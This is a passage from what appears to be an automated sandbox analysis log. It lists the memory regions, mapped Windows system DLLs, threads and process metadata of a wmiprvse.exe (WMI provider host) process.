end_va = 0x7fffcc989fff monitored = 0 entry_point = 0x7fffcc9648d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2161 start_va = 0x7fffcca30000 end_va = 0x7fffccc23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 182 os_tid = 0xe34 Thread: id = 183 os_tid = 0xa8c Thread: id = 184 os_tid = 0xf54 Thread: id = 185 os_tid = 0xf08 [0261.760] DllCanUnloadNow () returned 0x1 [0261.761] DllCanUnloadNow () returned 0x1 [0261.761] DllCanUnloadNow () returned 0x1 [0381.790] DllCanUnloadNow () returned 0x1 [0381.791] DllCanUnloadNow () returned 0x1 [0381.791] DllCanUnloadNow () returned 0x1 Thread: id = 186 os_tid = 0xf10 Thread: id = 187 os_tid = 0xf34 Thread: id = 188 os_tid = 0xf30 Thread: id = 415 os_tid = 0xfdc Process: id = "7" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x49897000" os_pid = "0x924" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x310" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0002e18f" [0xc000000f] Region: id = 1888 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1889 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1890 start_va = 0x30000 end_va = 0x4cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1891 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1892 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1893 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1894 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1895 start_va = 0x100000 end_va = 0x1c8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1896 start_va = 0x1d0000 end_va = 0x1d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1897 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1898 start_va = 0x1f0000 end_va = 0x1f2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1899 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1900 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1901 start_va = 0x410000 end_va = 0x417fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1902 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 1903 start_va = 0x430000 end_va = 0x430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 1904 start_va = 0x440000 end_va = 0x444fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1905 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1906 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1907 start_va = 0x470000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 1908 start_va = 0x570000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1909 start_va = 0x5f0000 end_va = 0x6b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 1910 start_va = 0x6c0000 end_va = 0x6c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 1911 start_va = 0x6d0000 end_va = 0x6d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 1912 start_va = 0x6e0000 end_va = 0x6e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 1913 start_va = 0x6f0000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 1914 start_va = 0x700000 end_va = 0xa37fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1915 start_va = 0xa40000 end_va = 0xc3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 1916 start_va = 0xc40000 end_va = 0xdc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c40000" filename = "" Region: id = 1917 start_va = 0xdd0000 end_va = 0xdd1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dd0000" filename = "" Region: id = 1918 start_va = 0xe50000 end_va = 0xf4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 1919 start_va = 0xf50000 end_va = 0xfcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 1920 start_va = 0xfd0000 end_va = 0x104ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 1921 start_va = 0x1050000 end_va = 0x10cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 1922 start_va = 0x10d0000 end_va = 0x114ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 1923 start_va = 0x1150000 end_va = 0x11cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 1924 start_va = 0x11d0000 end_va = 0x124ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 1925 start_va = 0x1360000 end_va = 0x1360fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001360000" filename = "" Region: id = 1926 start_va = 0x1380000 end_va = 0x1382fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cimwin32.dll.mui" filename = "\\Windows\\System32\\wbem\\en-US\\cimwin32.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\cimwin32.dll.mui") Region: id = 1927 start_va = 0x13a0000 end_va = 0x149ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013a0000" filename = "" Region: id = 1928 start_va = 0x14b0000 end_va = 0x15affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 1929 start_va = 0x15b0000 end_va = 0x15b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000015b0000" filename = "" Region: id = 1930 start_va = 0x1650000 end_va = 0x16cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001650000" filename = "" Region: id = 1931 start_va = 0x16d0000 end_va = 0x16d9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 1932 start_va = 0x1720000 end_va = 0x191ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001720000" filename = "" Region: id = 1933 start_va = 0x1930000 end_va = 0x1931fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001930000" filename = "" Region: id = 1934 start_va = 0x1940000 end_va = 0x1943fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "69b8a4a.bud" filename = "\\Windows\\System32\\spool\\V4Dirs\\6BDA92AB-61C7-4947-9A07-1E5FB24D8AEE\\69b8a4a.BUD" (normalized: "c:\\windows\\system32\\spool\\v4dirs\\6bda92ab-61c7-4947-9a07-1e5fb24d8aee\\69b8a4a.bud") Region: id = 1935 start_va = 0x19b0000 end_va = 0x19b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019b0000" filename = "" Region: id = 1936 start_va = 0x19c0000 end_va = 0x19c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019c0000" filename = "" Region: id = 1937 start_va = 0x19d0000 end_va = 0x19d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 1938 start_va = 0x19e0000 end_va = 0x19e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019e0000" filename = "" Region: id = 1939 start_va = 0x19f0000 end_va = 0x19f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019f0000" filename = "" Region: id = 1940 start_va = 0x1a10000 end_va = 0x1a18fff monitored = 0 entry_point = 0x1ba1e00 region_type = mapped_file name = "printconfig.dll" filename = "\\Windows\\System32\\DriverStore\\FileRepository\\prnms003.inf_amd64_5a50b04019391dd4\\Amd64\\PrintConfig.dll" (normalized: "c:\\windows\\system32\\driverstore\\filerepository\\prnms003.inf_amd64_5a50b04019391dd4\\amd64\\printconfig.dll") Region: id = 1941 start_va = 0x1a20000 end_va = 0x1a23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 1942 start_va = 0x1a60000 end_va = 0x1b9efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1943 start_va = 0x1ca0000 end_va = 0x2352fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsres.dll" filename = "\\Windows\\System32\\spool\\drivers\\x64\\3\\FXSRES.DLL" (normalized: "c:\\windows\\system32\\spool\\drivers\\x64\\3\\fxsres.dll") Region: id = 1944 start_va = 0x2390000 end_va = 0x240ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 1945 start_va = 0x2410000 end_va = 0x260ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 1946 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1947 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 1948 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 1949 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 1950 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 1951 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 1952 start_va = 0x7ff708950000 end_va = 0x7ff7089cdfff monitored = 0 entry_point = 0x7ff708962580 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 1953 start_va = 0x7fffa8090000 end_va = 0x7fffa81acfff monitored = 0 entry_point = 0x7fffa814aea0 region_type = mapped_file name = "tpmcoreprovisioning.dll" filename = "\\Windows\\System32\\TpmCoreProvisioning.dll" (normalized: "c:\\windows\\system32\\tpmcoreprovisioning.dll") Region: id = 1954 start_va = 0x7fffacbe0000 end_va = 0x7fffacc2cfff monitored = 0 entry_point = 0x7fffacc14740 region_type = mapped_file name = "fxsapi.dll" filename = "\\Windows\\System32\\spool\\drivers\\x64\\3\\FXSAPI.DLL" (normalized: "c:\\windows\\system32\\spool\\drivers\\x64\\3\\fxsapi.dll") Region: id = 1955 start_va = 0x7fffacc30000 end_va = 0x7fffacc99fff monitored = 0 entry_point = 0x7fffacc3fc00 region_type = mapped_file name = "fxstiff.dll" filename = "\\Windows\\System32\\spool\\drivers\\x64\\3\\FXSTIFF.DLL" (normalized: "c:\\windows\\system32\\spool\\drivers\\x64\\3\\fxstiff.dll") Region: id = 1956 start_va = 0x7fffacca0000 end_va = 0x7fffacce1fff monitored = 0 entry_point = 0x7fffacccc3b0 region_type = mapped_file name = "tapi32.dll" filename = "\\Windows\\System32\\tapi32.dll" (normalized: "c:\\windows\\system32\\tapi32.dll") Region: id = 1957 start_va = 0x7fffaccf0000 end_va = 0x7fffacd18fff monitored = 0 entry_point = 0x7fffacd0b070 region_type = mapped_file name = "fxswzrd.dll" filename = "\\Windows\\System32\\spool\\drivers\\x64\\3\\FXSWZRD.DLL" (normalized: "c:\\windows\\system32\\spool\\drivers\\x64\\3\\fxswzrd.dll") Region: id = 1958 start_va = 0x7fffacd20000 end_va = 0x7fffacdf4fff monitored = 1 entry_point = 0x7fffacd53ac0 region_type = mapped_file name = "jscript.dll" filename = "\\Windows\\System32\\jscript.dll" (normalized: "c:\\windows\\system32\\jscript.dll") Region: id = 1959 start_va = 0x7ffface00000 end_va = 0x7fffad171fff monitored = 0 entry_point = 0x7fffacf91e00 region_type = mapped_file name = "printconfig.dll" filename = "\\Windows\\System32\\DriverStore\\FileRepository\\prnms003.inf_amd64_5a50b04019391dd4\\Amd64\\PrintConfig.dll" (normalized: "c:\\windows\\system32\\driverstore\\filerepository\\prnms003.inf_amd64_5a50b04019391dd4\\amd64\\printconfig.dll") Region: id = 1960 start_va = 0x7fffaec50000 end_va = 0x7fffaec6afff monitored = 0 entry_point = 0x7fffaec559c0 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 1961 start_va = 0x7fffb17e0000 end_va = 0x7fffb1810fff monitored = 0 entry_point = 0x7fffb17e8940 region_type = mapped_file name = "prntvpt.dll" filename = "\\Windows\\System32\\prntvpt.dll" (normalized: "c:\\windows\\system32\\prntvpt.dll") Region: id = 1962 start_va = 0x7fffb3040000 end_va = 0x7fffb3070fff monitored = 0 entry_point = 0x7fffb304e9a0 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll") Region: id = 1963 start_va = 0x7fffb3a80000 end_va = 0x7fffb3a8afff monitored = 0 entry_point = 0x7fffb3a82410 region_type = mapped_file name = "schedcli.dll" filename = "\\Windows\\System32\\schedcli.dll" (normalized: "c:\\windows\\system32\\schedcli.dll") Region: id = 1964 start_va = 0x7fffb3ba0000 end_va = 0x7fffb3bf1fff monitored = 0 entry_point = 0x7fffb3bb3150 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1965 start_va = 0x7fffb3c00000 end_va = 0x7fffb3dfffff monitored = 1 entry_point = 0x7fffb3c29130 region_type = mapped_file name = "cimwin32.dll" filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll") Region: id = 1966 start_va = 0x7fffb4300000 end_va = 0x7fffb4317fff monitored = 0 entry_point = 0x7fffb4305be0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1967 start_va = 0x7fffb4400000 end_va = 0x7fffb4409fff monitored = 0 entry_point = 0x7fffb4401390 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1968 start_va = 0x7fffb4410000 end_va = 0x7fffb4453fff monitored = 0 entry_point = 0x7fffb442f4d0 region_type = mapped_file name = "mpoav.dll" filename = "\\Program Files\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files\\windows defender\\mpoav.dll") Region: id = 1969 start_va = 0x7fffb4750000 end_va = 0x7fffb4777fff monitored = 0 entry_point = 0x7fffb4759440 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1970 start_va = 0x7fffb4780000 end_va = 0x7fffb4793fff monitored = 0 entry_point = 0x7fffb4781800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1971 start_va = 0x7fffb4820000 end_va = 0x7fffb492afff monitored = 0 entry_point = 0x7fffb4855c10 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1972 start_va = 0x7fffb57e0000 end_va = 0x7fffb57f7fff monitored = 0 entry_point = 0x7fffb57e1360 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1973 start_va = 0x7fffb5860000 end_va = 0x7fffb5877fff monitored = 0 entry_point = 0x7fffb5865c50 region_type = mapped_file name = "win32_tpm.dll" filename = "\\Windows\\System32\\wbem\\Win32_Tpm.dll" (normalized: "c:\\windows\\system32\\wbem\\win32_tpm.dll") Region: id = 1974 start_va = 0x7fffb6b60000 end_va = 0x7fffb6bedfff monitored = 0 entry_point = 0x7fffb6b70250 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 1975 start_va = 0x7fffb6bf0000 end_va = 0x7fffb6c19fff monitored = 0 entry_point = 0x7fffb6c0c770 region_type = mapped_file name = "fxsui.dll" filename = "\\Windows\\System32\\spool\\drivers\\x64\\3\\FXSUI.DLL" (normalized: "c:\\windows\\system32\\spool\\drivers\\x64\\3\\fxsui.dll") Region: id = 1976 start_va = 0x7fffb7b90000 end_va = 0x7fffb7e29fff monitored = 0 entry_point = 0x7fffb7c296c0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1_none_b555e41d4684ddec\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1_none_b555e41d4684ddec\\comctl32.dll") Region: id = 1977 start_va = 0x7fffbae80000 end_va = 0x7fffbae91fff monitored = 0 entry_point = 0x7fffbae83330 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1978 start_va = 0x7fffbc0d0000 end_va = 0x7fffbc104fff monitored = 0 entry_point = 0x7fffbc0d6250 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1979 start_va = 0x7fffbda80000 end_va = 0x7fffbdaaffff monitored = 0 entry_point = 0x7fffbda85370 region_type = mapped_file name = "wmipcima.dll" filename = "\\Windows\\System32\\wbem\\wmipcima.dll" (normalized: "c:\\windows\\system32\\wbem\\wmipcima.dll") Region: id = 1980 start_va = 0x7fffbe330000 end_va = 0x7fffbe3b5fff monitored = 1 entry_point = 0x7fffbe345570 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1981 start_va = 0x7fffbe540000 end_va = 0x7fffbe567fff monitored = 0 entry_point = 0x7fffbe542110 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1982 start_va = 0x7fffbfed0000 end_va = 0x7fffbffd1fff monitored = 0 entry_point = 0x7fffbff157d0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1983 start_va = 0x7fffc06c0000 end_va = 0x7fffc06dcfff monitored = 0 entry_point = 0x7fffc06c29b0 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1984 start_va = 0x7fffc07b0000 end_va = 0x7fffc07c6fff monitored = 0 entry_point = 0x7fffc07b24b0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1985 start_va = 0x7fffc17b0000 end_va = 0x7fffc17bafff monitored = 0 entry_point = 0x7fffc17b1f70 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1986 start_va = 0x7fffc43b0000 end_va = 0x7fffc43c8fff monitored = 0 entry_point = 0x7fffc43b51e0 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1987 start_va = 0x7fffc5c40000 end_va = 0x7fffc5c49fff monitored = 0 entry_point = 0x7fffc5c41780 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1988 start_va = 0x7fffc6740000 end_va = 0x7fffc6753fff monitored = 0 entry_point = 0x7fffc67428c0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1989 start_va = 0x7fffc8120000 end_va = 0x7fffc8132fff monitored = 0 entry_point = 0x7fffc8123f60 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1990 start_va = 0x7fffc8320000 end_va = 0x7fffc8aa9fff monitored = 0 entry_point = 0x7fffc84dc050 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1991 start_va = 0x7fffc8ac0000 end_va = 0x7fffc8ae2fff monitored = 0 entry_point = 0x7fffc8ac3700 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1992 start_va = 0x7fffc9150000 end_va = 0x7fffc91e0fff monitored = 0 entry_point = 0x7fffc9175d30 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1993 start_va = 0x7fffc9230000 end_va = 0x7fffc9263fff monitored = 0 entry_point = 0x7fffc9236e70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1994 start_va = 0x7fffc9360000 end_va = 0x7fffc9376fff monitored = 0 entry_point = 0x7fffc9361d60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1995 start_va = 0x7fffc9590000 end_va = 0x7fffc95cafff monitored = 0 entry_point = 0x7fffc959a620 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1996 start_va = 0x7fffc95d0000 end_va = 0x7fffc95dbfff monitored = 0 entry_point = 0x7fffc95d1ce0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1997 start_va = 0x7fffc95e0000 end_va = 0x7fffc96a9fff monitored = 0 entry_point = 0x7fffc960bc80 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1998 start_va = 0x7fffc96b0000 end_va = 0x7fffc96f1fff monitored = 0 entry_point = 0x7fffc96ba3e0 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1999 start_va = 0x7fffc9a70000 end_va = 0x7fffc9a87fff monitored = 0 entry_point = 0x7fffc9a74aa0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2000 start_va = 0x7fffc9a90000 end_va = 0x7fffc9a9bfff monitored = 0 entry_point = 0x7fffc9a92200 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2001 start_va = 0x7fffc9ad0000 end_va = 0x7fffc9b29fff monitored = 0 entry_point = 0x7fffc9adb770 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2002 start_va = 0x7fffc9b80000 end_va = 0x7fffc9baafff monitored = 0 entry_point = 0x7fffc9b82db0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 2003 start_va = 0x7fffc9bb0000 end_va = 0x7fffc9beafff monitored = 0 entry_point = 0x7fffc9bb4000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 2004 start_va = 0x7fffc9bf0000 end_va = 0x7fffc9c16fff monitored = 0 entry_point = 0x7fffc9bf6200 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 2005 start_va = 0x7fffc9d00000 end_va = 0x7fffc9d11fff monitored = 0 entry_point = 0x7fffc9d055f0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2006 start_va = 0x7fffc9ec0000 end_va = 0x7fffc9eebfff monitored = 0 entry_point = 0x7fffc9ec7370 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2007 start_va = 0x7fffc9f10000 end_va = 0x7fffc9f21fff monitored = 0 entry_point = 0x7fffc9f13e30 region_type = mapped_file name = "umpdc.dll" filename = "\\Windows\\System32\\umpdc.dll" (normalized: "c:\\windows\\system32\\umpdc.dll") Region: id = 2008 start_va = 0x7fffc9f30000 end_va = 0x7fffc9f7afff monitored = 0 entry_point = 0x7fffc9f33480 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2009 start_va = 0x7fffc9f80000 end_va = 0x7fffca021fff monitored = 0 entry_point = 0x7fffc9faca60 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 2010 start_va = 0x7fffca030000 end_va = 0x7fffca05dfff monitored = 0 